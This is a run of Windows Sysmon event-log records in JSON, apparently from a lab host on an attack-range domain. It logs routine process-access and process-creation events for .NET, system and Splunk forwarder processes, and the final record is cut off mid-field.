{"EventTime":"2020-08-01 05:58:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7216,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:49.418\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0499-5F25-0000-001044650F00}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:49.418","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0499-5F25-0000-001044650F00}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7217,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:49.418\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0499-5F25-0000-001044650F00}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:49.418","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0499-5F25-0000-001044650F00}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7218,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:49.433\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0499-5F25-0000-001044650F00}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:49.433","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0499-5F25-0000-001044650F00}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7219,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.200\r\nProcessGuid: {A837DB8D-049A-5F25-0000-0010336A0F00}\r\nProcessId: 3544\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.200","ProcessGuid":"{A837DB8D-049A-5F25-0000-0010336A0F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7220,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.199\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-049A-5F25-0000-0010336A0F00}\r\nTargetProcessId: 3544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.199","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-049A-5F25-0000-0010336A0F00}","TargetProcessId":"3544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7221,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.199\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049A-5F25-0000-0010336A0F00}\r\nTargetProcessId: 3544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.199","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049A-5F25-0000-0010336A0F00}","TargetProcessId":"3544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7222,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7223,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7224,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 